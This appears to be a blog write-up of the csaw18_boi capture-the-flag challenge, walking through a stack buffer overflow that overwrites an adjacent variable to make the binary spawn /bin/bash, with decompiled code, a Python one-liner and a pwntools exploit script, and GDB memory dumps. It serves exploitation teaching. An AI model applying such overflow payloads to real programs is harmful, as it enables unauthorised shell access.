Security CTF - Nightmare Module 04 - csaw18_boi

Introduction

Nightmare is a collection of security related Capture the Flag (CTF) challenges focused on binary exploitation. They’re grouped into modules that each introduce new concepts in order of escalating complexity.

The goal of a security CTF challenge is to analyze a previously unknown program, and then exploit it in order to complete an objective. The goal is usually to extract a hidden value (i.e. the ‘flag’) from the challenge program, or to exploit the program to get an interactive shell.

Module 04 focuses on using stack buffer overflows to manipulate the values of variables on the stack. It’s comprised of three CTF challenges: csaw18_boi, tamu_pwn1, tw17_justdoit.

This post documents my progress working through the csaw18_boi challenge. This challenge was part of Cybersecurity Awareness Worldwide’s (CSAW) 2018 Capture The Flag event.

Tools

csaw18_boi

The csaw18_boi challenge contains a binary file named boi. We start by gathering some basic information about the file.

file command

We learn that it’s a 64 bit ELF executable, dynamically linked and hasn’t had it symbol information stripped form it (which makes reverse engineering it easier).

1ctf@ctf2204:csaw18_boi$ file ./boi
2
3boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1537584f3b2381e1b575a67cba5fbb87878f9711, not stripped

checksec

Checksec reveals non-executable stack/DEP protection is not enabled for this binary, but stack canary protections are.

1ctf@ctf2204:csaw18_boi$ checksec ./boi
2[*] '/home/ctf/projects/nightmare/modules/04-bof_variable/csaw18_boi/boi'
3    Arch:     amd64-64-little
4    RELRO:    Partial RELRO
5    Stack:    Canary found
6    NX:       NX enabled
7    PIE:      No PIE (0x400000)

main() Ghidra Decompiler Listing

I’ve used Ghidra to dissassemble & decompile the binary. After some analysis & renaming of variables for clarity the main() function’s decompilation is as follows.

 1// Variables have been renamed in Ghidra to clarify their usage
 2undefined8 main(void)
 3
 4{
 5  long in_FS_OFFSET;
 6  undefined8 userInput;
 7  undefined8 stack_junk1;
 8  undefined4 stack_junk2;
 9  uint checkValue;
10  undefined4 stack_junk3;
11  long stack_canary;
12  
13  stack_canary = *(long *)(in_FS_OFFSET + 0x28);
14
15  userInput = 0;
16  stack_junk1 = 0;
17  stack_junk2 = 0;
18  stack_junk3 = 0;
19
20  checkValue = 0xdeadbeef;
21  
22  puts("Are you a big boiiiii??");
23  read(0,&userInput,0x18);
24  
25  if (checkValue == 0xcaf3baee) {
26    run_cmd("/bin/bash");
27  }
28  else {
29    run_cmd("/bin/date");
30  }
31  
32  if (stack_canary != *(long *)(in_FS_OFFSET + 0x28)) {
33                    /* WARNING: Subroutine does not return */
34    __stack_chk_fail();
35  }
36  return 0;
37}

Analysis

run_cmd() is a function defined in this binary as a wrapper of system()

1void run_cmd(char *param_1)
2
3{
4  system(param_1);
5  return;
6}

So the user enters input after which the program chooses between executing /bin/bash and /bin/date with system().

We want to get it to execute /bin/bash and get a shell.

The problem is that based on the normal execution flow shown in the decompiler listing the user input has no effect on checkValue, it only goes into userInput.

The key detail here is the number of bytes the read() call will receive. It’s reading 24 bytes starting at the address of the stack allocated variable userInput. If we look at the stack layout and tally up the memory that’s been allocated for each variable (Ghidra’s Stack Frame Editor gives a good view of the stack frame layoutn) … it becomes apparent that the read() call will allow our user input to overflow beyond the stack memory allocated for variable userInput and into the memory meant for the checkValue variable used in the conditional logic. This will allow us to change the value of the checkValue variable at runtime if we craft our input correctly, and as a result control the execution flow through the if statement.

The region of stack memory we’re interested in will look like this at runtime

Addr N       =========================
             = userInput   (8 bytes) =  <= read() starts writing bytes here, moving 'down' the stack
Addr N+0x08  =========================
             = stack_junk1 (8 bytes) =
Addr N+0x10  =========================
             = stack_junk2 (4 bytes) =
Addr N+0x14  =========================
             = checkValue  (4 bytes) =  <= the variable checked by the if statement
Addr N+0x18  =========================
             = stack_junk3 (4 bytes) =
             =========================

So if we provide 20 bytes (0x14) of input we’ve filled everything right up until the start of checkValue. If we provide 4 more bytes for a total of 24 (0x18) we’ve filled everything up to and including the memory allocated on the stack for checkValue. This will allow us to ‘plant’ the value 0xcaf3baee and control execution through the if statement by making the comparison evaluate to true.

Exploitation

TLDR - The following command will successfully exploit the boi exectutable and overwrite the value of the checkValue variable with 0xcaf3baee:

 1ctf@ctf2204:csaw18_boi$ cat <(python3 -c "import sys;sys.stdout.buffer.write(b'A'*20+b'\xee\xba\xf3\xca')") - | ./boi
 2Are you a big boiiiii??
 3echo $$
 41914
 5ps f
 6   PID TTY      STAT   TIME COMMAND
 7  1101 pts/2    Ss     0:00 -bash
 8  1177 pts/2    S+     0:00  \_ vim my_exploit.py
 9  1072 pts/1    Ss     0:00 -bash
10  1909 pts/1    S+     0:00  \_ cat /dev/fd/63 -
11  1911 pts/1    Z+     0:00  |   \_ [bash] <defunct>
12  1910 pts/1    S+     0:00  \_ ./boi
13  1913 pts/1    S+     0:00      \_ sh -c /bin/bash
14  1914 pts/1    S+     0:00          \_ /bin/bash
15  1916 pts/1    R+     0:00              \_ ps f
16  1007 pts/0    Ss     0:00 -bash
17  1069 pts/0    S+     0:00  \_ tmux

We see the “Are you a big boiiiii??"puts() output and then the execution seems to pause and wait. It’s actually waiting for our input because it’s spawned a bash shell. In the example above I’ve echo’d $$ to show our current PID, and then displayed a process tree using pstree. We can see in the tree that the boi executable is PID 1910 and it spawned a child process 1913 that ran sh -c /bin/bash (the call to system(), see the man page for system()). And in turn 1913 spawned a child process 1914 which is our actual bash shell.

So we’ve successfully diverted the execution flow of the if statement to spawn us a shell.

But that command is pretty gnarly. We’re using process substitution on our Python one-liner (PID 1911), redirecting that into cat where we also have a trailing ‘-’ character to keep stdin open so our shell doesn’t exit immediately. Doing this sort of exploit directly in the shell like this can be tricky & frustrating to troubleshoot. Read more about the tricks to get it working here

This is where the pwntools framework really shines. It has a whole lot of functionality to interact with process, redirect intput/output, automate attaching a debugger, etc… It’s a swiss army knife for CTF & exploit development.

You’ll need to read the docs & play with it to really get up to speed with it’s capabilities. The Getting Started section runs through the main concepts.

Below is the Python script I wrote using pwntools to solve this challenge.

 1#!/usr/bin/env python3
 2
 3from pwn import *
 4import os
 5
 6log.info("My exploit script's PID: {}".format(os.getpid()))
 7
 8
 9# pwntools config  telling it what command to use
10# to spawn new terminals if it runs a command that
11context.terminal = ["tmux", "new-window"]
12
13variable_overwrite_payload = b'\xee\xba\xf3\xca'
14
15# run our target process under gdb
16
17# io = gdb.debug("./boi", gdbscript='''
18# set follow-fork-mode child
19# b *main+103
20# continue
21# ''')
22
23# or run our target process directly
24# object returned & stored in 'io' lets us interact
25# with the process programmatically
26io = process("./boi")
27
28log.info("Sending payload...")
29
30# Send our payload to the process's stdin.
31# At this point it's waiting at the read() call to receive input
32# 20 bytes of the character 'A' + 4 bytes of the value 0xcaf3baee
33io.send(b"A"*20+variable_overwrite_payload)
34
35log.info("Sent.")
36
37# drop into an interactive shell connected to the stdin/stdout 
38# of our target process
39io.interactive()

And the output of running the script. Nice tidy output, no wild bash trickery to redirect stdin/stdout. The pwntools framework handles all of that for us and provides a nice, high level scripting API.

 1ctf@ctf2204:csaw18_boi$ ./my_exploit.py 
 2[*] My exploit script's PID: 1949
 3[+] Starting local process './boi': pid 1952
 4[*] Sending payload...
 5[*] Sent.
 6[*] Switching to interactive mode
 7Are you a big boiiiii??
 8$ echo $$
 91955
10$ ps f
11    PID TTY      STAT   TIME COMMAND
12   1101 pts/2    Ss     0:00 -bash
13   1949 pts/2    Sl+    0:00  \_ python3 ./my_exploit.py
14   1952 pts/3    Ss+    0:00      \_ ./boi
15   1953 pts/3    S+     0:00          \_ sh -c /bin/bash
16   1955 pts/3    S+     0:00              \_ /bin/bash
17   1956 pts/3    R+     0:00                  \_ ps f
18   1072 pts/1    Ss+    0:00 -bash
19   1007 pts/0    Ss     0:00 -bash
20   1069 pts/0    S+     0:00  \_ tmux

If we watch the process under GDB as it receives our input we can observe the variable being overwritten in the process memory.

I’ve set breakpoints just before the read() call occurs (address main+95) and just before the if statement comparison occurs (address main+103).

 1   0x000000000040068f <+78>:    lea    rax,[rbp-0x30]
 2   0x0000000000400693 <+82>:    mov    edx,0x18
 3   0x0000000000400698 <+87>:    mov    rsi,rax
 4   0x000000000040069b <+90>:    mov    edi,0x0
 5=> 0x00000000004006a0 <+95>:    call   0x400500 <read@plt>       <= break 1
 6   0x00000000004006a5 <+100>:   mov    eax,DWORD PTR [rbp-0x1c]
 7   0x00000000004006a8 <+103>:   cmp    eax,0xcaf3baee            <= break 2
 8   0x00000000004006ad <+108>:   jne    0x4006bb <main+122>
 9   0x00000000004006af <+110>:   mov    edi,0x40077c
10   0x00000000004006b4 <+115>:   call   0x400626 <run_cmd>

With the process waiting at main+95, before the read() call our stack looks like this:

1gef➤  hexdump qword --size 5 $rsp
20x00007ffc544b7f90│+0x0000   0x00007ffc544b80e8   
30x00007ffc544b7f98│+0x0008   0x0000000101000000   
40x00007ffc544b7fa0│+0x0010   0x0000000000000000   
50x00007ffc544b7fa8│+0x0018   0x0000000000000000   
60x00007ffc544b7fb0│+0x0020   0xdeadbeef00000000

We can see the value 0xdeadbeef sitting there in stack memory on the last line. This is the value the variable checkValue was initialized to. This is what we want to overwrite. The specific stack addresses will vary each run due to ASLR but the relative offset of the variable’s memory from the head of the stack while at this breakpoint will always remain the same (+0x0020).

When we continue to our next breakpoint at main+103, after the read() call, at the comparison operation for the if statement, our stack looks like this:

1gef➤  hexdump qword --size 5 $rsp
20x00007ffdd7e88970│+0x0000   0x00007ffdd7e88ac8   
30x00007ffdd7e88978│+0x0008   0x0000000100000000   
40x00007ffdd7e88980│+0x0010   0x4141414141414141   
50x00007ffdd7e88988│+0x0018   0x4141414141414141   
60x00007ffdd7e88990│+0x0020   0xcaf3baee41414141

Starting on the third line we see the value 41 repeating. These are the 20 letter ‘A’ we sent as part of our input. 0x41 is the hex ASCII code for ‘A’.

And on the last line of the output above we can confirm that we did in fact overwrite checkValue with the value from our input. We see 0xcaf3baee there.

This causes the conditional’s equality check to evaluate to true and execute /bin/bash giving us a shell.

Conclusion

This challenge presents a pretty straight forward stack buffer overflow due to an incorrect bounds for the read() call. This makes it possible to overwrite the variable adjacent to our input buffer, which is then used in subsequent conditional logic. Gaining control of the value of this variable using crafted input lets us affect the execution flow of the program through this conditional logic.

The fix would be to read the correct amount of bytes for the amount of memory we’ve allocated as an input buffer. In this example they have set a bound on the number of bytes to read but it’s too large a value for the amount of memory they’ve allocated on the stack.

This challenge represents ‘baby steps’ towards exploiting more complex buffer overflows involving gaining control of a stack frame’s return address. No security mitigations needed to be bypassed to solve this one (DEP/NX, ASLR, PIE). As mentioned above a stack canary is present and checksec indicates that NX is enabled but since we only needed to overwrite an adjacent variable to influence an existing conditional control flow check we didn’t come into contact with these security features.

More on these in upcoming posts. Stay tuned!